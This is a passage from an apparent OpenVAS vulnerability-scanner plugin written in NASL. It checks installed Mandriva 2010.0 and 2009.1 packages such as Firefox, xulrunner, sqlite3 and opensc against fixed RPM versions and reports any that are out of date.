isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.28.0~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets\", rpm:\"google-gadgets~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget1.0_0\", rpm:\"lib64ggadget1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-dbus1.0_0\", rpm:\"lib64ggadget-dbus1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-gtk1.0_0\", rpm:\"lib64ggadget-gtk1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-js1.0_0\", rpm:\"lib64ggadget-js1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-npapi1.0_0\", rpm:\"lib64ggadget-npapi1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-qt1.0_0\", rpm:\"lib64ggadget-qt1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-webkitjs0\", rpm:\"lib64ggadget-webkitjs0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget-xdg1.0_0\", rpm:\"lib64ggadget-xdg1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64google-gadgets-devel\", rpm:\"lib64google-gadgets-devel~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-epiphany\", rpm:\"beagle-epiphany~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", rpm:\"beagle-gui~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany\", rpm:\"epiphany~2.26.1~1.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany-devel\", rpm:\"epiphany-devel~2.26.1~1.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-r-kiosk\", rpm:\"firefox-ext-r-kiosk~0.8.0~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.25.3~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-common\", rpm:\"google-gadgets-common~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-gtk\", rpm:\"google-gadgets-gtk~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-qt\", rpm:\"google-gadgets-qt~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-xul\", rpm:\"google-gadgets-xul~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget1.0_0\", rpm:\"libggadget1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-gtk1.0_0\", rpm:\"libggadget-gtk1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-qt1.0_0\", rpm:\"libggadget-qt1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgoogle-gadgets-devel\", rpm:\"libgoogle-gadgets-devel~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-beagle\", rpm:\"mozilla-thunderbird-beagle~0.3.9~9.12mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.7~1.11mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.26.0~3.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets\", rpm:\"google-gadgets~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ggadget1.0_0\", rpm:\"lib64ggadget1.0_0~0.10.5~8.10mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 